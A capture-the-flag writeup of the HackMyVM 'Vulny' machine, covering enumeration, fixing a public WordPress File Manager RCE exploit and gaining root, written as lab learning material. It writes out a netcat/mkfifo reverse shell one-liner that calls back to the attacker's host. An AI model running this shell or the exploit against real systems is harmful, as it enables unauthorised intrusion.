
Vulny

Author: loco0000
Electrical Engineering student and aspiring pentester.
Hackmyvm Easy - This article is part of a series.
Part 1: This Article

Machine Information

Name: Vulny
OS: Linux
Author: SML
Difficulty: Easy
Site: hackmyvm

Recon and enumeration

Service scan:

Let's check the webpage:

It's the default Apache2 webpage, so we run a gobuster scan.

We find two interesting directories, javascript and secret; let's check them:

We find something that may be interesting: that's the directory we are in right now, so let's keep that in mind. On the javascript page we don't have enough privileges to view it:

Let's enumerate the /secret directory:

We find another three directories; let's check each one of them:


Later on, I found this list of directories in the /wp-admin directory, but couldn't access them:


Let's check the /uploads directory in /wp-content:

We find a zip file; let's download it and see its contents:

Among the files in the zip, we see an .sql file; we research how to open it:

Let's follow these steps. We find nothing of interest in the database tables (make sure to start the MySQL service first with sudo service mysql start):

Apparently, this database has no information at all; ideally, it would contain user and password information. I decide to do a little bit of research on the wp file manager and its version to see if it can be exploited in some way.

After a while, I find a GitHub page containing an exploit for this app, which is a plugin for WordPress; the exploit allows remote command execution. Now I'll follow these steps and see if I can get a reverse shell:

I get an error code:

Let's check the code and see what the problem is:

We can see that the default directory it will look up starts with /wp-content, but remember our directory enumeration: the /wp-content directory is inside the /secret directory:

Also, just for the sake of confirmation, let's check the content of the zip file we downloaded and see if the readme.txt is there:

There it is. Now, to make the code work, we just need to add the /secret string to the variable, like this:

It should work now; let's try again:

We find another error, but this time, in my opinion, it's on the programmer's part: didn't it say that version 6.0 was also vulnerable?

It is; let's check the code again:

We found the problem. To sum up what's happening here: the greater-than operator (>) is causing it. Because of it, instead of treating versions 6.0 through 6.8 as vulnerable, the script only detects 6.1 through 6.8, leaving out version 6.0 of the app. Let's add an = next to the > so that 6.0 is taken into account, and then try the code again:
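The version-range check described above, as an added example that is neither the exploit's code nor the author's: a Python check of a plugin version against the 6.0 to 6.8 range stated in this writeup, with the inclusive-bound bug beside the corrected comparison, plus a numeric (not string) comparison so a version like 6.10 is handled correctly. The sample readme text and the parsing of its "Stable tag:" line are assumptions about the plugin readme format, not content from the page.

```python
import re
from typing import Tuple

# Affected range stated in the writeup: 6.0 through 6.8, both ends inclusive.
AFFECTED_LOW = "6.0"
AFFECTED_HIGH = "6.8"

# Constructed sample of a plugin readme.txt header (assumed format; not the
# file from the machine).
SAMPLE_README = """=== Example File Manager ===
Contributors: example
Requires at least: 4.0
Stable tag: 6.0
"""


def parse_version(version: str) -> Tuple[int, ...]:
    """Convert '6.0' or '6.8.1' into a tuple of ints so comparison is numeric.
    Comparing the raw strings would wrongly rank '6.10' below '6.8'."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(p) for p in parts)


def stable_tag_from_readme(readme_text: str) -> str:
    """Pull the 'Stable tag:' value out of a plugin readme.txt (assumed layout)."""
    match = re.search(r"^Stable tag:\s*([0-9.]+)\s*$", readme_text, re.MULTILINE)
    if match is None:
        raise ValueError("no Stable tag line found")
    return match.group(1)


def buggy_is_affected(version: str) -> bool:
    """The check as described in the writeup: '>' instead of '>=' on the lower
    bound, so version 6.0 itself is reported as not affected."""
    v = parse_version(version)
    return v > parse_version(AFFECTED_LOW) and v <= parse_version(AFFECTED_HIGH)


def is_affected(version: str, low: str = AFFECTED_LOW, high: str = AFFECTED_HIGH) -> bool:
    """Corrected inclusive check: low <= version <= high."""
    v = parse_version(version)
    return parse_version(low) <= v <= parse_version(high)


if __name__ == "__main__":
    found = stable_tag_from_readme(SAMPLE_README)
    print(f"readme reports {found}: buggy={buggy_is_affected(found)} fixed={is_affected(found)}")
```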

After looking at the code a while longer, I realize there are other strings referencing the directory that I did not change:

Initial access and user pivoting

Now, let's run the exploit again:

There we go! Let's see what we can find:

First, we find the user adrian. Let's see if we can access his home folder; it seems we cannot traverse directories, so let's try that reverse shell we saw earlier on the GitHub page of the exploit:

First we start our listener on our machine:

Then we run rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR-MACHINE-IP> <PORT-OF-YOUR-CHOOSING> >/tmp/f on the target machine:

We have a reverse shell! Let's upgrade our shell a little:

Using the following. Remember that we have to run a bash shell for this to work, which in my case I need to do because I'm using zsh. I run the command and explore; first, I look for other users:

Besides root, only the user adrian can use a shell session. Let's go to his home directory and check its contents:

We can't access anything interesting in this directory, but now we know we have to pivot to this user. Let's check if there's something of interest in the /var/www/ directory:

Nothing there…

I decide to explore the contents of the wordpress directory, where I find some interesting files:

I inspect the contents of that PHP file:

Let's try that:

Great! Now let's get that user flag:

Privilege Escalation

Now, let's run the usual commands to check if we can find any privesc vectors:

We look that program up on GTFOBins:

We try this and see if we can access the contents of the /root directory:

Even better, we get root! Let's see if we can get that flag:

And we have pwned the machine.

Things I learned from this machine

  • A WordPress plugin vulnerability affecting versions 6.0 to 6.8.
  • How to open a database I downloaded from a file server with MySQL (and that those databases won't always contain data…).
  • Remember to start a bash shell when setting up a full TTY in the netcat listener (if bash is not your main shell).
  • Check config files for useful information.
  • Apparently, after checking other writeups, I could've used the Metasploit Framework too for this machine.